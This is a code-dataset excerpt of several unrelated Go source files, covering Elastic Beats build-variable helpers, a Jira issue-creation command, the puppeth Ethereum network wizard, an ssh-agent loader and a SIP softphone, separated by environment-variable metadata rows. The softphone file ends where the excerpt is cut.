versionQualifier, versionQualified = os.LookupEnv("VERSION_QUALIFIER")
}
// ProjectType specifies the type of project (OSS vs X-Pack).
type ProjectType uint8
// Project types.
const (
OSSProject ProjectType = iota
XPackProject
CommunityProject
)
// ErrUnknownProjectType is returned if an unknown ProjectType value is used.
var ErrUnknownProjectType = fmt.Errorf("unknown ProjectType")
// EnvMap returns a map containing the common settings variables and all
// variables from the environment. args are appended to the output prior to
// adding the environment variables (so env vars have the highest precedence).
func EnvMap(args ...map[string]interface{}) map[string]interface{} {
envMap := varMap(args...)
// Add the environment (highest precedence).
for _, e := range os.Environ() {
env := strings.SplitN(e, "=", 2)
envMap[env[0]] = env[1]
}
return envMap
}
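// Illustrative example: with BEAT_NAME=custombeat exported in the environment,
//
//	EnvMap(map[string]interface{}{"BEAT_NAME": "ignored"})["BEAT_NAME"]
//
// evaluates to "custombeat", because the process environment is applied last.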
func varMap(args ...map[string]interface{}) map[string]interface{} {
data := map[string]interface{}{
"GOOS": GOOS,
"GOARCH": GOARCH,
"GOARM": GOARM,
"Platform": Platform,
"BinaryExt": BinaryExt,
"XPackDir": XPackDir,
"BeatName": BeatName,
"BeatServiceName": BeatServiceName,
"BeatIndexPrefix": BeatIndexPrefix,
"BeatDescription": BeatDescription,
"BeatVendor": BeatVendor,
"BeatLicense": BeatLicense,
"BeatURL": BeatURL,
"BeatUser": BeatUser,
"Snapshot": Snapshot,
"DEV": DevBuild,
"Qualifier": versionQualifier,
}
// Add the extra args to the map.
for _, m := range args {
for k, v := range m {
data[k] = v
}
}
return data
}
func dumpVariables() (string, error) {
var dumpTemplate = `## Variables
GOOS = {{.GOOS}}
GOARCH = {{.GOARCH}}
GOARM = {{.GOARM}}
Platform = {{.Platform}}
BinaryExt = {{.BinaryExt}}
XPackDir = {{.XPackDir}}
BeatName = {{.BeatName}}
BeatServiceName = {{.BeatServiceName}}
BeatIndexPrefix = {{.BeatIndexPrefix}}
BeatDescription = {{.BeatDescription}}
BeatVendor = {{.BeatVendor}}
BeatLicense = {{.BeatLicense}}
BeatURL = {{.BeatURL}}
BeatUser = {{.BeatUser}}
VersionQualifier = {{.Qualifier}}
## Functions
beat_doc_branch = {{ beat_doc_branch }}
beat_version = {{ beat_version }}
commit = {{ commit }}
date = {{ date }}
elastic_beats_dir = {{ elastic_beats_dir }}
go_version = {{ go_version }}
repo.RootImportPath = {{ repo.RootImportPath }}
repo.CanonicalRootImportPath = {{ repo.CanonicalRootImportPath }}
repo.RootDir = {{ repo.RootDir }}
repo.ImportPath = {{ repo.ImportPath }}
repo.SubDir = {{ repo.SubDir }}
`
return Expand(dumpTemplate)
}
// DumpVariables writes the template variables and values to stdout.
func DumpVariables() error {
out, err := dumpVariables()
if err != nil {
return err
}
fmt.Println(out)
return nil
}
var (
commitHash string
commitHashOnce sync.Once
)
// CommitHash returns the full length git commit hash.
func CommitHash() (string, error) {
var err error
commitHashOnce.Do(func() {
commitHash, err = sh.Output("git", "rev-parse", "HEAD")
})
return commitHash, err
}
// CommitHashShort returns the short git commit hash (the first six
// characters of the full hash).
func CommitHashShort() (string, error) {
shortHash, err := CommitHash()
if len(shortHash) > 6 {
shortHash = shortHash[:6]
}
return shortHash, err
}
var (
elasticBeatsDirValue string
elasticBeatsDirErr error
elasticBeatsDirLock sync.Mutex
)
// SetElasticBeatsDir sets the internal elastic beats dir to a preassigned value
func SetElasticBeatsDir(path string) {
elasticBeatsDirLock.Lock()
defer elasticBeatsDirLock.Unlock()
elasticBeatsDirValue = path
}
// ElasticBeatsDir returns the path to Elastic beats dir.
func ElasticBeatsDir() (string, error) {
elasticBeatsDirLock.Lock()
defer elasticBeatsDirLock.Unlock()
if elasticBeatsDirValue != "" || elasticBeatsDirErr != nil {
return elasticBeatsDirValue, elasticBeatsDirErr
}
elasticBeatsDirValue, elasticBeatsDirErr = findElasticBeatsDir()
if elasticBeatsDirErr == nil {
log.Println("Found Elastic Beats dir at", elasticBeatsDirValue)
}
return elasticBeatsDirValue, elasticBeatsDirErr
}
// findElasticBeatsDir returns the root directory of the Elastic Beats module, using "go list".
//
// When running within the Elastic Beats repo, this will return the repo root. Otherwise,
// it will return the root directory of the module from within the module cache or vendor
// directory.
func findElasticBeatsDir() (string, error) {
repo, err := GetProjectRepoInfo()
if err != nil {
return "", err
}
if repo.IsElasticBeats() {
return repo.RootDir, nil
}
return gotool.ListModuleCacheDir(elasticBeatsModulePath)
}
var (
buildDate = time.Now().UTC().Format(time.RFC3339)
)
// BuildDate returns the time that the build started.
func BuildDate() string {
return buildDate
}
var (
goVersionValue string
goVersionErr error
goVersionOnce sync.Once
)
// GoVersion returns the version of Go defined in the project's .go-version
// file.
func GoVersion() (string, error) {
goVersionOnce.Do(func() {
goVersionValue = os.Getenv("BEAT_GO_VERSION")
if goVersionValue != "" {
return
}
goVersionValue, goVersionErr = getBuildVariableSources().GetGoVersion()
})
return goVersionValue, goVersionErr
}
var (
beatVersionRegex = regexp.MustCompile(`(?m)^const defaultBeatVersion = "(.+)"\r?$`)
beatVersionValue string
beatVersionErr error
beatVersionOnce sync.Once
)
// BeatQualifiedVersion returns the Beat's qualified version. The value can be overwritten by
// setting VERSION_QUALIFIER in the environment.
func BeatQualifiedVersion() (string, error) {
version, err := beatVersion()
if err != nil {
return "", err
}
// version qualifier can intentionally be set to "" to override build time var
if !versionQualified || versionQualifier == "" {
return version, nil
}
return version + "-" + versionQualifier, nil
}
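// Worked example (not in the original source), assuming a defaultBeatVersion
// of "7.0.0": with VERSION_QUALIFIER=beta1 exported, BeatQualifiedVersion
// returns "7.0.0-beta1"; with VERSION_QUALIFIER unset (or set to ""), it
// returns "7.0.0" unchanged.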
// beatVersion returns the Beat's version. The value can be overridden by
// setting BEAT_VERSION in the environment.
func beatVersion() (string, error) {
beatVersionOnce.Do(func() {
beatVersionValue = os.Getenv("BEAT_VERSION")
if beatVersionValue != "" {
return
}
beatVersionValue, beatVersionErr = getBuildVariableSources().GetBeatVersion()
})
return beatVersionValue, beatVersionErr
}
var (
beatDocBranchRegex = regexp.MustCompile(`(?m)doc-branch:\s*([^\s]+)\r?$`)
beatDocBranchValue string
beatDocBranchErr error
beatDocBranchOnce sync.Once
)
// BeatDocBranch returns the documentation branch name associated with the
// Beat branch.
func BeatDocBranch() (string, error) {
beatDocBranchOnce.Do(func() {
beatDocBranchValue = os.Getenv("BEAT_DOC_BRANCH")
if beatDocBranchValue != "" {
return
}
beatDocBranchValue, beatDocBranchErr = getBuildVariableSources().GetDocBranch()
})
return beatDocBranchValue, beatDocBranchErr
}
// --- BuildVariableSources
var (
// DefaultBeatBuildVariableSources contains the default locations build
// variables are read from by Elastic Beats.
DefaultBeatBuildVariableSources = &BuildVariableSources{
BeatVersion: "{{ elastic_beats_dir }}/libbeat/version/version.go",
GoVersion: "{{ elastic_beats_dir }}/.go-version",
DocBranch: "{{ elastic_beats_dir }}/libbeat/docs/version.asciidoc",
}
buildVariableSources *BuildVariableSources
buildVariableSourcesLock sync.Mutex
)
// SetBuildVariableSources sets the BuildVariableSources that defines where
// certain build data should be sourced from. Community Beats must call this.
func SetBuildVariableSources(s *BuildVariableSources) {
buildVariableSourcesLock.Lock()
defer buildVariableSourcesLock.Unlock()
buildVariableSources = s
}
func getBuildVariableSources() *BuildVariableSources {
buildVariableSourcesLock.Lock()
defer buildVariableSourcesLock.Unlock()
if buildVariableSources != nil {
return buildVariableSources
}
repo, err := GetProjectRepoInfo()
if err != nil {
panic(err)
}
if repo.IsElasticBeats() {
buildVariableSources = DefaultBeatBuildVariableSources
return buildVariableSources
}
panic(errors.Errorf("magefile must call devtools.SetBuildVariableSources() "+
"because it is not an elastic beat (repo=%+v)", repo.RootImportPath))
}
// BuildVariableSources is used to explicitly define what files contain build
// variables and how to parse the values from that file. This removes ambiguity
// about where the data is sourced and allows a degree of customization for
// community Beats.
//
// Default parsers are used if one is not defined.
type BuildVariableSources struct {
// File containing the Beat version.
BeatVersion string
// Parses the Beat version from the BeatVersion file.
BeatVersionParser func(data []byte) (string, error)
// File containing the Go version to be used in cross-builds.
GoVersion string
// Parses the Go version from the GoVersion file.
GoVersionParser func(data []byte) (string, error)
// File containing the documentation branch.
DocBranch string
// Parses the documentation branch from the DocBranch file.
DocBranchParser func(data []byte) (string, error)
}
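// Illustrative sketch, not part of the original file, of how a community
// Beat's magefile might wire up its own sources before any target runs. The
// file paths here are assumptions for the example only; only parsers that
// differ from the defaults need to be set.
//
//	devtools.SetBuildVariableSources(&devtools.BuildVariableSources{
//		BeatVersion: "{{ elastic_beats_dir }}/version/version.go",
//		GoVersion:   "{{ elastic_beats_dir }}/.go-version",
//		DocBranch:   "{{ elastic_beats_dir }}/docs/version.asciidoc",
//	})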
func (s *BuildVariableSources) expandVar(in string) (string, error) {
return expandTemplate("inline", in, map[string]interface{}{
"elastic_beats_dir": ElasticBeatsDir,
})
}
// GetBeatVersion reads the BeatVersion file and parses the version from it.
func (s *BuildVariableSources) GetBeatVersion() (string, error) {
file, err := s.expandVar(s.BeatVersion)
if err != nil {
return "", err
}
data, err := ioutil.ReadFile(file)
if err != nil {
return "", errors.Wrapf(err, "failed to read beat version file=%v", file)
}
if s.BeatVersionParser == nil {
s.BeatVersionParser = parseBeatVersion
}
return s.BeatVersionParser(data)
}
// GetGoVersion reads the GoVersion file and parses the version from it.
func (s *BuildVariableSources) GetGoVersion() (string, error) {
file, err := s.expandVar(s.GoVersion)
if err != nil {
return "", err
}
data, err := ioutil.ReadFile(file)
if err != nil {
return "", errors.Wrapf(err, "failed to read go version file=%v", file)
}
if s.GoVersionParser == nil {
s.GoVersionParser = parseGoVersion
}
return s.GoVersionParser(data)
}
// GetDocBranch reads the DocBranch file and parses the branch from it.
func (s *BuildVariableSources) GetDocBranch() (string, error) {
file, err := s.expandVar(s.DocBranch)
if err != nil {
return "", err
}
data, err := ioutil.ReadFile(file)
if err != nil {
return "", errors.Wrapf(err, "failed to read doc branch file=%v", file)
}
if s.DocBranchParser == nil {
s.DocBranchParser = parseDocBranch
}
return s.DocBranchParser(data)
}
func parseBeatVersion(data []byte) (string, error) {
matches := beatVersionRegex.FindSubmatch(data)
if len(matches) == 2 {
return string(matches[1]), nil
}
return "", errors.New("failed to parse beat version file")
}
func parseGoVersion(data []byte) (string, error) {
return strings.TrimSpace(string(data)), nil
}
func parseDocBranch(data []byte) (string, error) {
matches := beatDocBranchRegex.FindSubmatch(data)
if len(matches) == 2 {
return string(matches[1]), nil
}
return "", errors.New("failed to parse beat doc branch")
}
// --- ProjectRepoInfo
// ProjectRepoInfo contains information about the project's repo.
type ProjectRepoInfo struct {
RootImportPath string // Import path at the project root.
CanonicalRootImportPath string // Pre-modules root import path (does not contain semantic import version identifier).
RootDir string // Root directory of the project.
ImportPath string // Import path of the current directory.
SubDir string // Relative path from the root dir to the current dir.
}
// IsElasticBeats returns true if the current project is
// github.com/elastic/beats.
func (r *ProjectRepoInfo) IsElasticBeats() bool {
return r.CanonicalRootImportPath == elasticBeatsImportPath
}
var (
repoInfoValue *ProjectRepoInfo
repoInfoErr error
repoInfoOnce sync.Once
)
// GetProjectRepoInfo returns information about the repo including the root
// import path and the current directory's import path.
func GetProjectRepoInfo() (*ProjectRepoInfo, error) {
repoInfoOnce.Do(func() {
if isUnderGOPATH() {
repoInfoValue, repoInfoErr = getProjectRepoInfoUnderGopath()
} else {
repoInfoValue, repoInfoErr = getProjectRepoInfoWithModules()
}
})
return repoInfoValue, repoInfoErr
}
func isUnderGOPATH() bool {
underGOPATH := false
srcDirs, err := listSrcGOPATHs()
if err != nil {
return false
}
for _, srcDir := range srcDirs {
rel, err := filepath.Rel(srcDir, CWD())
if err != nil {
continue
}
if !strings.Contains(rel, "..") {
underGOPATH = true
}
}
return underGOPATH
}
func getProjectRepoInfoWithModules() (*ProjectRepoInfo, error) {
var (
cwd = CWD()
rootDir string
subDir string
)
possibleRoot := cwd
var errs []string
for {
isRoot, err := isGoModRoot(possibleRoot)
if err != nil {
errs = append(errs, err.Error())
}
if isRoot {
rootDir = possibleRoot
subDir, err = filepath.Rel(rootDir, cwd)
if err != nil {
errs = append(errs, err.Error())
}
break
}
possibleRoot = filepath.Dir(possibleRoot)
}
if rootDir == "" {
return nil, errors.Errorf("failed to find root dir of module file: %v", errs)
}
rootImportPath, err := gotool.GetModuleName()
if err != nil {
return nil, err
}
return &ProjectRepoInfo{
RootImportPath: rootImportPath,
CanonicalRootImportPath: filepath.ToSlash(extractCanonicalRootImportPath(rootImportPath)),
RootDir: rootDir,
SubDir: subDir,
ImportPath: filepath.ToSlash(filepath.Join(rootImportPath, subDir)),
}, nil
}
func isGoModRoot(path string) (bool, error) {
gomodPath := filepath.Join(path, "go.mod")
_, err := os.Stat(gomodPath)
if os.IsNotExist(err) {
return false, nil
}
if err != nil {
return false, err
}
return true, nil
}
func getProjectRepoInfoUnderGopath() (*ProjectRepoInfo, error) {
var (
cwd = CWD()
errs []string
rootDir string
)
srcDirs, err := listSrcGOPATHs()
if err != nil {
return nil, err
}
for _, srcDir := range srcDirs {
_, root, err := vcs.FromDir(cwd, srcDir)
if err != nil {
// Try the next gopath.
errs = append(errs, err.Error())
continue
}
rootDir = filepath.Join(srcDir, root)
break
}
if rootDir == "" {
return nil, errors.Errorf("error while determining root directory: %v", errs)
}
subDir, err := filepath.Rel(rootDir, cwd)
if err != nil {
return nil, errors.Wrap(err, "failed to get relative path to repo root")
}
rootImportPath, err := gotool.GetModuleName()
if err != nil {
return nil, err
}
return &ProjectRepoInfo{
RootImportPath: rootImportPath,
CanonicalRootImportPath: filepath.ToSlash(extractCanonicalRootImportPath(rootImportPath)),
RootDir: rootDir,
SubDir: subDir,
ImportPath: filepath.ToSlash(filepath.Join(rootImportPath, subDir)),
}, nil
}
func extractCanonicalRootImportPath(rootImportPath string) string {
// In order to be compatible with go modules, the root import
// path of any module at major version v2 or higher must include
// the major version.
// Ref: https://github.com/golang/go/wiki/Modules#semantic-import-versioning
//
// Thus, Beats has to include the major version as well.
// This regex removes the major version from the import path.
re := regexp.MustCompile(`(/v[1-9][0-9]*)$`)
return re.ReplaceAllString(rootImportPath, "")
}
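// Illustrative sketch of the regexp above, not part of the original file:
//
//	extractCanonicalRootImportPath("github.com/elastic/beats/v7") // "github.com/elastic/beats"
//	extractCanonicalRootImportPath("github.com/example/mybeat")   // unchanged (no /vN suffix)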
func listSrcGOPATHs() ([]string, error) {
var (
cwd = CWD()
errs []string
srcDirs []string
)
for _, gopath := range filepath.SplitList(build.Default.GOPATH) {
gopath = filepath.Clean(gopath)
if !strings.HasPrefix(cwd, gopath) {
// Fixes an issue on macOS when /var is actually /private/var.
var err error
gopath, err = filepath.EvalSymlinks(gopath)
if err != nil {
errs = append(errs, err.Error())
continue
}
}
srcDirs = append(srcDirs, filepath.Join(gopath, "src"))
}
if len(srcDirs) == 0 {
return srcDirs, errors.Errorf("failed to find any GOPATH %v", errs)
}
return srcDirs, nil
}
| [
"\"BEAT_GO_VERSION\"",
"\"BEAT_VERSION\"",
"\"BEAT_DOC_BRANCH\""
] | [] | [
"BEAT_VERSION",
"BEAT_GO_VERSION",
"BEAT_DOC_BRANCH"
] | [] | ["BEAT_VERSION", "BEAT_GO_VERSION", "BEAT_DOC_BRANCH"] | go | 3 | 0 | |
cmd/jkl/create.go | package main
import (
"bytes"
"errors"
"flag"
"fmt"
"io"
"os"
"strings"
"text/template"
"otremblay.com/jkl"
)
type CreateCmd struct {
args []string
project string
file string
issuetype string
}
func NewCreateCmd(args []string) (*CreateCmd, error) {
	ccmd := &CreateCmd{}
	f := flag.NewFlagSet("x", flag.ExitOnError)
	// flag.StringVar immediately overwrites the target with the default
	// value, so the JIRA_PROJECT fallback must be supplied as the flag
	// default rather than set on the struct beforehand.
	f.StringVar(&ccmd.project, "p", os.Getenv("JIRA_PROJECT"), "Jira project key")
	f.StringVar(&ccmd.file, "f", "", "File to get issue description from")
	f.Parse(args)
ccmd.args = f.Args()
return ccmd, nil
}
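// Illustrative usage sketch, not part of the original file; the project key,
// file name, and issue type are assumptions for the example only, and it is
// assumed the jkl binary routes a "create" subcommand's arguments here:
//
//	JIRA_PROJECT=PROJ jkl create Bug
//	jkl create -p PROJ -f description.txt Task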
var ErrCcmdJiraProjectRequired = errors.New("Jira project needs to be set")
func (ccmd *CreateCmd) Create() error {
var b = bytes.NewBuffer([]byte{})
var readfile bool
	if fp := os.Getenv("JIRA_ISSUE_TEMPLATE"); fp != "" {
		if f, err := os.Open(fp); err == nil {
			// Copy the template into the buffer, then release the handle.
			_, err := io.Copy(b, f)
			f.Close()
			if err == nil {
				readfile = true
			}
		}
	}
if ccmd.project == "" {
return ErrCcmdJiraProjectRequired
}
isstype := ""
if len(ccmd.args) > 0 {
isstype = ccmd.args[0]
}
cm, err := jkl.GetCreateMeta(ccmd.project, isstype)
if err != nil {
fmt.Fprintln(os.Stderr, fmt.Sprintf("Error getting the CreateMeta for project [%s] and issue types [%s]", ccmd.project, isstype), err)
}
if !readfile {
createTemplate.Execute(b, cm)
}
var iss *jkl.JiraIssue
// TODO: Evil badbad don't do this.
var isst = cm.Projects[0].IssueTypes[0].Fields
for _, v := range cm.Projects[0].IssueTypes {
		if strings.EqualFold(isstype, v.Name) {
isst = v.Fields
break
}
}
em := &jkl.EditMeta{Fields: isst}
if ccmd.file != "" {
iss, err = GetIssueFromFile(ccmd.file, b, em)
if err != nil {
return err
}
} else {
iss, err = GetIssueFromTmpFile(b, em)
if err != nil {
return err
}
}
if iss.Fields != nil &&
(iss.Fields.Project == nil || iss.Fields.Project.Key == "") {
iss.Fields.Project = &jkl.Project{Key: ccmd.project}
}
iss, err = jkl.Create(iss)
if err != nil {
return err
}
fmt.Println(iss.Key)
return nil
}
func (ccmd *CreateCmd) Run() error {
return ccmd.Create()
}
var createTemplate = template.Must(template.New("createissue").Parse(`{{range .Projects -}}
Project: {{.Key}}
{{range .IssueTypes -}}
Issue Type: {{.Name}}
Summary:
Description:
{{.RangeFieldSpecs}}
{{end}}
{{end}}`))
| [
"\"JIRA_PROJECT\"",
"\"JIRA_ISSUE_TEMPLATE\""
] | [] | [
"JIRA_PROJECT",
"JIRA_ISSUE_TEMPLATE"
] | [] | ["JIRA_PROJECT", "JIRA_ISSUE_TEMPLATE"] | go | 2 | 0 | |
ethereum/cmd/puppeth/wizard_intro.go | // Copyright 2017 The go-ethereum Authors
// This file is part of go-ethereum.
//
// go-ethereum is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// go-ethereum is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with go-ethereum. If not, see <http://www.gnu.org/licenses/>.
package main
import (
"bufio"
"encoding/json"
"fmt"
"io/ioutil"
"os"
"path/filepath"
"strings"
"sync"
"github.com/tenderly/solidity-hmr/ethereum/log"
)
// makeWizard creates and returns a new puppeth wizard.
func makeWizard(network string) *wizard {
return &wizard{
network: network,
conf: config{
Servers: make(map[string][]byte),
},
servers: make(map[string]*sshClient),
services: make(map[string][]string),
in: bufio.NewReader(os.Stdin),
}
}
// run displays some useful infos to the user, starting on the journey of
// setting up a new or managing an existing Ethereum private network.
func (w *wizard) run() {
fmt.Println("+-----------------------------------------------------------+")
fmt.Println("| Welcome to puppeth, your Ethereum private network manager |")
fmt.Println("| |")
fmt.Println("| This tool lets you create a new Ethereum network down to |")
fmt.Println("| the genesis block, bootnodes, miners and ethstats servers |")
fmt.Println("| without the hassle that it would normally entail. |")
fmt.Println("| |")
fmt.Println("| Puppeth uses SSH to dial in to remote servers, and builds |")
fmt.Println("| its network components out of Docker containers using the |")
fmt.Println("| docker-compose toolset. |")
fmt.Println("+-----------------------------------------------------------+")
fmt.Println()
	// Make sure we have a good network name to work with.
// Docker accepts hyphens in image names, but doesn't like it for container names
if w.network == "" {
fmt.Println("Please specify a network name to administer (no spaces, hyphens or capital letters please)")
for {
w.network = w.readString()
if !strings.Contains(w.network, " ") && !strings.Contains(w.network, "-") && strings.ToLower(w.network) == w.network {
fmt.Printf("\nSweet, you can set this via --network=%s next time!\n\n", w.network)
break
}
log.Error("I also like to live dangerously, still no spaces, hyphens or capital letters")
}
}
log.Info("Administering Ethereum network", "name", w.network)
// Load initial configurations and connect to all live servers
w.conf.path = filepath.Join(os.Getenv("HOME"), ".puppeth", w.network)
blob, err := ioutil.ReadFile(w.conf.path)
if err != nil {
log.Warn("No previous configurations found", "path", w.conf.path)
} else if err := json.Unmarshal(blob, &w.conf); err != nil {
log.Crit("Previous configuration corrupted", "path", w.conf.path, "err", err)
} else {
// Dial all previously known servers concurrently
var pend sync.WaitGroup
for server, pubkey := range w.conf.Servers {
pend.Add(1)
go func(server string, pubkey []byte) {
defer pend.Done()
log.Info("Dialing previously configured server", "server", server)
client, err := dial(server, pubkey)
if err != nil {
log.Error("Previous server unreachable", "server", server, "err", err)
}
w.lock.Lock()
w.servers[server] = client
w.lock.Unlock()
}(server, pubkey)
}
pend.Wait()
w.networkStats()
}
// Basics done, loop ad infinitum about what to do
for {
fmt.Println()
fmt.Println("What would you like to do? (default = stats)")
fmt.Println(" 1. Show network stats")
if w.conf.Genesis == nil {
fmt.Println(" 2. Configure new genesis")
} else {
fmt.Println(" 2. Manage existing genesis")
}
if len(w.servers) == 0 {
fmt.Println(" 3. Track new remote server")
} else {
fmt.Println(" 3. Manage tracked machines")
}
if len(w.services) == 0 {
fmt.Println(" 4. Deploy network components")
} else {
fmt.Println(" 4. Manage network components")
}
choice := w.read()
switch {
case choice == "" || choice == "1":
w.networkStats()
case choice == "2":
if w.conf.Genesis == nil {
fmt.Println()
fmt.Println("What would you like to do? (default = create)")
fmt.Println(" 1. Create new genesis from scratch")
fmt.Println(" 2. Import already existing genesis")
choice := w.read()
switch {
case choice == "" || choice == "1":
w.makeGenesis()
case choice == "2":
w.importGenesis()
default:
log.Error("That's not something I can do")
}
} else {
w.manageGenesis()
}
case choice == "3":
if len(w.servers) == 0 {
if w.makeServer() != "" {
w.networkStats()
}
} else {
w.manageServers()
}
case choice == "4":
if len(w.services) == 0 {
w.deployComponent()
} else {
w.manageComponents()
}
default:
log.Error("That's not something I can do")
}
}
}
| [
"\"HOME\""
] | [] | [
"HOME"
] | [] | ["HOME"] | go | 1 | 0 | |
internal/hostkey/agent.go | package hostkey
import (
"fmt"
"net"
"os"
"sync"
"golang.org/x/crypto/ssh/agent"
)
var (
agentOnce sync.Once
agentClient agent.ExtendedAgent
agentErr error
)
func LoadAgent() (agent.ExtendedAgent, error) {
	agentOnce.Do(func() {
		socket := os.Getenv("SSH_AUTH_SOCK")
		if socket == "" {
			agentErr = fmt.Errorf("SSH_AUTH_SOCK is not set; is an ssh-agent running?")
			return
		}
		var conn net.Conn
		conn, agentErr = net.Dial("unix", socket)
		if agentErr != nil {
			agentErr = fmt.Errorf("failed to open SSH_AUTH_SOCK: %w", agentErr)
			return
		}
		agentClient = agent.NewClient(conn)
	})
if agentErr != nil {
return nil, agentErr
}
return agentClient, nil
}
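// exampleListAgentKeys is an illustrative sketch, not part of the original
// file: it loads the shared agent client and prints the identities the
// running ssh-agent currently holds.
func exampleListAgentKeys() error {
	ag, err := LoadAgent()
	if err != nil {
		return err
	}
	keys, err := ag.List()
	if err != nil {
		return err
	}
	for _, key := range keys {
		// Format is the key type (e.g. "ssh-ed25519"); Comment is the label
		// the key was added with.
		fmt.Println(key.Format, key.Comment)
	}
	return nil
}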
| [
"\"SSH_AUTH_SOCK\""
] | [] | [
"SSH_AUTH_SOCK"
] | [] | ["SSH_AUTH_SOCK"] | go | 1 | 0 | |
fone/main.go | // Copyright 2020 Justine Alexandra Roberts Tunney
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
// #cgo pkg-config: ncurses libpulse-simple
// #include <stdlib.h>
// #include <ncurses.h>
// #include <pulse/simple.h>
// #include <pulse/error.h>
import "C"
import (
"errors"
"flag"
"fmt"
"io/ioutil"
"log"
"net"
"net/http"
"os"
"os/signal"
"time"
"unsafe"
"github.com/ktmdan/gosip/dialog"
"github.com/ktmdan/gosip/dsp"
"github.com/ktmdan/gosip/rtp"
"github.com/ktmdan/gosip/sdp"
"github.com/ktmdan/gosip/sip"
"github.com/ktmdan/gosip/util"
)
const (
hz = 8000
chans = 1
ptime = 20
ssize = 2
psamps = hz / (1000 / ptime) * chans
pbytes = psamps * ssize
)
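// Worked example of the derived sizes above (not in the original source):
// with hz=8000, ptime=20 and chans=1, psamps = 8000/(1000/20)*1 = 160
// samples per packet, and pbytes = 160*2 = 320 bytes, since each sample is
// a 16-bit (2-byte) mono value.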
var (
addressFlag = flag.String(
"address",
"",
"Public IP (or hostname) of the local machine. Defaults to asking an untrusted webserver.",
)
paServerFlag = flag.String("paServer", "", "PulseAudio server name")
paSinkFlag = flag.String("paSink", "", "PulseAudio device or sink name")
muteFlag = flag.Bool("mute", false, "Send comfort noise rather than microphone input")
paName = C.CString("fone")
)
func main() {
log.SetFlags(log.LstdFlags | log.Lmicroseconds | log.Lshortfile)
flag.Usage = func() {
fmt.Fprintf(os.Stderr, "Usage: %s URI\n", os.Args[0])
flag.PrintDefaults()
}
flag.Parse()
if len(flag.Args()) != 1 {
flag.Usage()
os.Exit(1)
}
// Whom Are We Calling?
requestURIString := flag.Args()[0]
requestURI, err := sip.ParseURI([]byte(requestURIString))
if err != nil {
fmt.Fprintf(os.Stderr, "Bad Request URI: %s\n", err.Error())
os.Exit(1)
}
// Computer Speaker
speaker, err := makePulseAudio(C.PA_STREAM_PLAYBACK, requestURIString)
if err != nil {
panic(err)
}
defer C.pa_simple_free(speaker)
defer C.pa_simple_flush(speaker, nil)
// Computer Microphone
mic, err := makePulseAudio(C.PA_STREAM_RECORD, requestURIString)
if err != nil {
panic(err)
}
defer C.pa_simple_free(mic)
// Get Public IP Address
publicIP := *addressFlag
if publicIP == "" {
publicIP, err = getPublicIP()
if err != nil {
panic(err)
}
}
// Create RTP Session
rs, err := rtp.NewSession("")
if err != nil {
panic(err)
}
defer rs.Close()
rtpPort := uint16(rs.Sock.LocalAddr().(*net.UDPAddr).Port)
// Construct SIP INVITE
invite := &sip.Msg{
Method: sip.MethodInvite,
Request: requestURI,
Via: &sip.Via{Host: publicIP},
To: &sip.Addr{Uri: requestURI},
From: &sip.Addr{Uri: &sip.URI{Host: publicIP, User: os.Getenv("USER")}},
Contact: &sip.Addr{Uri: &sip.URI{Host: publicIP}},
Payload: &sdp.SDP{
Addr: publicIP,
Origin: sdp.Origin{
ID: util.GenerateOriginID(),
Addr: publicIP,
},
Audio: &sdp.Media{
Port: rtpPort,
Codecs: []sdp.Codec{sdp.ULAWCodec, sdp.DTMFCodec},
},
},
Warning: "dark lord funk you up",
}
// Create SIP Dialog State Machine
dl, err := dialog.NewDialog(invite)
if err != nil {
panic(err)
}
// Send Audio Every 20ms
var frame rtp.Frame
awgn := dsp.NewAWGN(-45.0)
ticker := time.NewTicker(ptime * time.Millisecond)
defer ticker.Stop()
// Ctrl+C or Kill Graceful Shutdown
death := make(chan os.Signal, 1)
signal.Notify(death, os.Interrupt, os.Kill)
// DTMF Terminal Input
keyboard := make(chan byte)
keyboardStart := func() {
C.cbreak()
C.noecho()
go func() {
var buf [1]byte
for {
amt, err := os.Stdin.Read(buf[:])
if err != nil || amt != 1 {
log.Printf("Keyboard: %s\r\n", err)
return
}
keyboard <- buf[0]
}
}()
}
C.initscr()
defer C.endwin()
// Let's GO!
var answered bool
var paerr C.int
for {
select {
// Send Audio
case <-ticker.C:
if *muteFlag {
for n := 0; n < psamps; n++ {
frame[n] = awgn.Get()
}
} else {
if C.pa_simple_read(mic, unsafe.Pointer(&frame[0]), pbytes, &paerr) != 0 {
log.Printf("Microphone: %s\r\n", C.GoString(C.pa_strerror(paerr)))
break
}
}
if err := rs.Send(&frame); err != nil {
log.Printf("RTP: %s\r\n", err.Error())
}
// Send DTMF
case ch := <-keyboard:
if err := rs.SendDTMF(ch); err != nil {
log.Printf("DTMF: %s\r\n", err.Error())
break
}
log.Printf("DTMF: %c\r\n", ch)
// Receive Audio
case frame := <-rs.C:
if len(frame) != psamps {
log.Printf("RTP: Received undersized frame: %d != %d\r\n", len(frame), psamps)
} else {
if C.pa_simple_write(speaker, unsafe.Pointer(&frame[0]), pbytes, &paerr) != 0 {
log.Printf("Speaker: %s\r\n", C.GoString(C.pa_strerror(paerr)))
}
}
rs.R <- frame
// Signalling
case rs.Peer = <-dl.OnPeer:
case state := <-dl.OnState:
switch state {
case dialog.Answered:
answered = true
keyboardStart()
case dialog.Hangup:
if answered {
return
} else {
os.Exit(1)
}
}
// Errors and Interruptions
case err := <-dl.OnErr:
log.Fatalf("SIP: %s\r\n", err.Error())
case err := <-rs.E:
log.Printf("RTP: %s\r\n", err.Error())
rs.CloseAfterError()
dl.Hangup <- true
case <-death:
dl.Hangup <- true
}
}
}
func makePulseAudio(direction C.pa_stream_direction_t, streamName string) (*C.pa_simple, error) {
var ss C.pa_sample_spec
ss.format = C.PA_SAMPLE_S16NE
ss.rate = hz
ss.channels = chans
var ba C.pa_buffer_attr
if direction == C.PA_STREAM_PLAYBACK {
ba.maxlength = pbytes * 4
ba.tlength = pbytes
ba.prebuf = pbytes * 2
ba.minreq = pbytes
